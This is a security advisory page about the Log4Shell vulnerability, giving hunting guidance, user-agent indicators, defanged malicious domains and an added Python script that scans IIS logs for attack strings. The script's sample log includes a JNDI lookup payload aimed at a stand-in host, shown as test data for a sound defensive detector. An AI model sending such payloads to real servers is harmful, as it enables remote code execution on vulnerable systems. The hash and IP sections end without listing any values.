itcsecure.com
URL: https://itcsecure.com/uncategorized/update-log4shell-cve-2021-44228-apache-log4j-vulnerability/
Submission: On July 26 via api from US — Scanned from DE
UPDATE: LOG4SHELL – CVE-2021-44228 – APACHE LOG4J VULNERABILITY
December 15, 2021, 9:12 am, ITC Secure
Priority: Critical

Executive Summary: ITC Secure is continuing to monitor for any alerts that could indicate an incident related to the recent Log4J vulnerability. ITC have carried out threat hunting across the available log sources we ingest into Sentinel for signs of initial compromise and reviewed endpoint activity for suspicious process executions which would be seen following any initial compromise. ITC will continue to carry out these threat hunting activities and will escalate any findings. We are conscious that we may not have coverage of all log sources within your estate and at the time of preparing this report, have provided further details and information on IOCs that your internal Network and Security Teams can use to assist further investigation.
Specific guidance that has been published by Microsoft can be found here: Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation - Microsoft Security Blog

Further Guidance at the time of preparing this report:

IOCs: While user agent strings are available from different log sources, to detect CVE-2021-44228, IIS server logs should be reviewed for evidence of the below user agents:
“jndi:ldap”
“Basic/Command/Base64”
If the above user agent strings are found within the IIS logs it is not indicative that a compromise has occurred, but it does indicate that someone has attempted to exploit the server. If the server was vulnerable to CVE-2021-44228 it may have succeeded. Please reach out to the ITC SOC should you find any reference to these user agent strings with the targeted server so that we can provide further investigation.

Hashes: These hashes have been identified as being involved in the recent Log4j attacks. If you have the means to search for hashes through anti-virus or similar, consider searching for evidence of these hashes within your environment. If found, contact ITC SOC for further investigation. If you can block the hashes, consider doing so but understand that attackers will be regularly changing their payloads to avoid detection through these IOCs.
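The IIS log review described above, as an added example (not ITC's tooling): it parses W3C extended log lines using the #Fields directive and flags requests whose cs(User-Agent) contains either advisory indicator. The log lines are constructed samples and the field layout is an assumption about how the server is configured.

```python
"""Scan IIS W3C extended log lines for the CVE-2021-44228 user-agent indicators."""
import re
from typing import Dict, Iterable, List

# Indicator substrings from the advisory; matched case-insensitively.
INDICATORS = ("jndi:ldap", "Basic/Command/Base64")
_PATTERN = re.compile("|".join(re.escape(i) for i in INDICATORS), re.IGNORECASE)

# Constructed sample log (not real traffic). IIS writes '+' in place of spaces
# inside cs(User-Agent), so the user agent is always a single token.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip cs(User-Agent) cs(Referer) sc-status
2021-12-13 10:01:02 10.0.0.5 GET /index.html - 443 198.51.100.10 Mozilla/5.0+(Windows+NT+10.0)+Chrome/96.0 - 200
2021-12-13 10:01:09 10.0.0.5 GET / - 443 203.0.113.7 ${jndi:ldap://scanner.invalid/a} - 200
2021-12-13 10:01:15 10.0.0.5 GET /login - 443 203.0.113.9 Mozilla/5.0+Basic/Command/Base64/QUJD - 404
"""


def parse_w3c(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Return one dict per request line, keyed by the names in the #Fields directive."""
    fields: List[str] = []
    records: List[Dict[str, str]] = []
    for raw in lines:
        line = raw.rstrip("\n")
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]   # field names follow the directive
            continue
        if line.startswith("#"):
            continue                    # other directives (#Software, #Date, ...)
        values = line.split(" ")
        if not fields or len(values) != len(fields):
            continue                    # header-less or malformed line; skip it
        records.append(dict(zip(fields, values)))
    return records


def find_log4j_indicators(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Return the records whose user agent contains any advisory indicator."""
    hits: List[Dict[str, str]] = []
    for rec in parse_w3c(lines):
        ua = rec.get("cs(User-Agent)", "")
        match = _PATTERN.search(ua)
        if match:
            hits.append({
                "time": f"{rec.get('date', '')} {rec.get('time', '')}",
                "client": rec.get("c-ip", ""),
                "indicator": match.group(0),
                "user_agent": ua,
            })
    return hits


if __name__ == "__main__":
    for hit in find_log4j_indicators(SAMPLE_LOG.splitlines()):
        print(f"{hit['time']} {hit['client']} matched '{hit['indicator']}' in UA: {hit['user_agent']}")
```

A hit means an exploitation attempt was logged, not that it succeeded; and because payloads are changed regularly, a plain substring match of this kind will miss encoded variants, so treat it as a triage aid rather than a complete detection.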
Domains: ITC has carried out and will continue to carry out threat hunting using the below domains which have been identified as being involved with CVE-2021-44228. Due to the nature of this attack, domains that host malicious payloads will change frequently to avoid detection or due to takedowns.
x41[.]me
m3[.]wtf
cuminside[.]club
abrahackbugs[.]xyz
pwn[.]af
rce[.]ee
psc4fuel[.]com
rs3c1[.]com
leakix[.]net

IPs: ITC has carried out and will continue to threat hunt using the below IP addresses against firewall logs where available.